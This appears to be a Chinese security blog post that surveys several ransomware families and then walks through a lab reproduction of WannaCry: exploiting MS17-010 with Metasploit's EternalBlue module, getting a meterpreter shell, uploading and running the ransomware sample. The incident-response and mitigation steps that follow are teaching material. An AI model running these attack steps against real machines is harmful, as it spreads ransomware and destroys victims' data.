勒索病毒简介

勒索病毒简介

• 勒索病毒,是一种新型电脑病毒,主要以邮件、程序木马、网页挂马的形式进行传播。该病毒性质恶劣、危害极大,一旦感染将给用户带来无法估量的损失。这种病毒利用各种加密算法对文件进行加密,被感染者一般无法解密,必须拿到解密的私钥才有可能破解。

• 勒索病毒通常使用非对称和对称加密算法组合的形式来加密文件,绝大部分勒索病毒均无法通过技术手段解密,一般无法溯源,危害巨大。

常见勒索病毒

WannaCry

• 2017年5月12日,WannaCry蠕虫通过MS17-010漏洞在全球范围大爆发,感染了大量的计算机,该蠕虫感染计算机后会向计算机中植入勒索病毒,导致电脑大量文件被加密。受害者电脑被黑客锁定后,病毒会提示支付价值相当于300美元(约合人民币2069元)的比特币才可解锁。

• WannaCry(又叫Wanna Decryptor),一种“蠕虫式”的勒索病毒软件,大小3.3MB,由不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播。

• WannaCry勒索病毒全球大爆发,至少150个国家、30万名用户中招,造成损失达80亿美元,已经影响到金融,能源,医疗等众多行业,造成严重的危机管理问题。

• 常见后缀名:wncry

• 传播方式:“永恒之蓝”漏洞

• 特征:启动时会连接一个不存在的URL,创建系统服务mssecsvc2.0,释放路径为windows目录

GlobeImposter

• GlobeImposter 勒索病毒于 2017年5月首次出现,主要通过钓鱼的方式传播

• 自2018年8月21日起,多地发生GlobeImposter勒索病毒事件,此次攻击目标主要是开启远程桌面服务的服务器,攻击者通过暴力破解服务器密码,对内网服务器发起扫描并人工投放勒索病毒,导致文件被加密,暂时无法解密。

• 常见后缀名:auchentoshan、动物名+4444 等

• 传播方法:RDP 暴力破解、钓鱼邮件、捆绑软件

• 特征:释放在 %appdata% 或 %localappdata%

Crysis/Dharma

• Crysis/Dharma 勒索病毒最早出现在 2016 年,2017 年 5 月在万能密钥被公布之后,消失了一段时间,但在 2017 年 6 月开始继续更新。攻击方法同样是通过远程 RDP 暴力破解的方式,植入用户的服务器进行攻击。由于采用 AES+RSA 的加密方式,其最新版本无法解密。

• 常见后缀:id + 勒索邮箱 + 特定后缀

• 传播方式:RDP 暴力破解

• 特征:勒索信位置在 startup 目录;样本位置在 % windir%\System32、startup 目录、% appdata% 目录

GandCrab

• GandCrab勒索病毒于2018年1月面世以来,一年内历经多次版本更新,目前最新的版本为V5。该病毒利用多种方式对企业网络进行攻击传播,受感染主机上的数据库、文档、图片、压缩包等文件将被加密,若没有相应数据或文件的备份,将会影响业务的正常运行。

• 病毒采用Salsa20和RSA-2048算法对文件进行加密,并修改文件后缀为.GDCB、.GRAB、.KRAB或5-10位随机字母,勒索信息文件为GDCB-DECRYPT.txt、KRAB-DECRYPT.txt、[5-10随机字母]-DECRYPT.html\txt,并将感染主机桌面背景替换为勒索信息图片。

• 常见后缀:随机生成

• 传播方式:RDP暴力破解、钓鱼邮件、捆绑软件、僵尸网络、漏洞传播等

• 特征:样本执行完毕后自动删除,并会修改感染主机桌面背景,有后缀 MANUAL.txt、DECRYPT.txt

解密方法

解密方法

蠕虫攻击流程

蠕虫攻击流程

模拟攻击——Wannacry勒索病毒

• WannaCry勒索病毒主要行为是传播和勒索

• 传播:利用基于445端口的SMB漏洞MS17-010(永恒之蓝)进行传播

• 勒索:释放文件,包括加密器、解密器、说明文件、语言文件等;内存加载加密器模块,加密执行类型文件,全部加密后启动解密器;解密器启动后,设置桌面背景显示勒索信息,弹出窗口显示付款账号和勒索信息

• 注意:实验复现过程中必须在虚拟机中完成,运行之前关闭虚拟机Win7文件共享,真机上一旦被感染你就真的只能想哭了(wannacry)

【——全网最全的网络安全学习资料包分享给爱学习的你,关注我,私信回复“资料领取”获取——】
1.网络安全多个方向学习路线
2.全网最全的CTF入门学习资料
3.一线大佬实战经验分享笔记
4.网安大厂面试题合集
5.红蓝对抗实战技术秘籍
6.网络安全基础入门、Linux、web安全、渗透测试方面视频

1、通过“永恒之蓝”进行攻击

search ms17-010 :搜索相关模块

use
exploit/windows/smb/ms17_010_eternalblue :使用永恒之蓝利用模块

设置好相关的参数后,开始攻击: run

反弹 meterpreter shell

解压勒索病毒

unzip 02\ 勒索-wannacry病毒样本-123456.zip

重命名wcry文件

2、上传 wannacry 勒索病毒文件

upload /root/桌面/wannacry/wcry.exe

3、执行勒索病毒文件:

meterpreter> execute -f wcry.exe

4、查看勒索病毒是否运行:

ps -ef | grep wcry.exe

5、被攻击的主机被勒索病毒加密

应急响应——事件处置

1、勒索病毒判定

• 对感染了勒索病毒的主机进行查看,发现是wannacry勒索病毒;所有被加密的文件变为后缀名为 .wncry 的文件,界面显示比特币支付提示,显示勒索倒计时

2、系统排查

• 查看是否存在隐藏账户等

3、网络排查:

netstat -ano

• 发现存在恶意连接

4、通过PID 查看程序执行目录:

wmic process where processid=2984 get name,executablepath

5、查看可疑的IP地址:

87.236.194.23、159.69.207.20、176.31.163.89

• 微步在线: https://x.threatbook.cn/

应急响应——事件抑制

1、隔离问题主机,断开网络连接,尽量关闭外部连接

2、将135,139,445端口关闭,封堵非业务端口

3、将服务器/主机密码全部更改为复杂的高强度的密码

4、安装安全补丁,尤其是 MS17-010 漏洞的补丁

应急响应——根除与恢复

1、终端安全企业级防病毒软件

2、使用流量监控设备进行内网流量监控

3、出口防火墙封堵可疑地址

勒索病毒在线查询与解密

• 360安全:
https://lesuobingdu.360.cn/

• 奇安信:
https://lesuobingdu.qianxin.com/

• 腾讯:
https://guanjia.qq.com/pr/ls/

• 深信服:
https://edr.sangfor.com.cn/#/information/ransom_search

  • 10
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值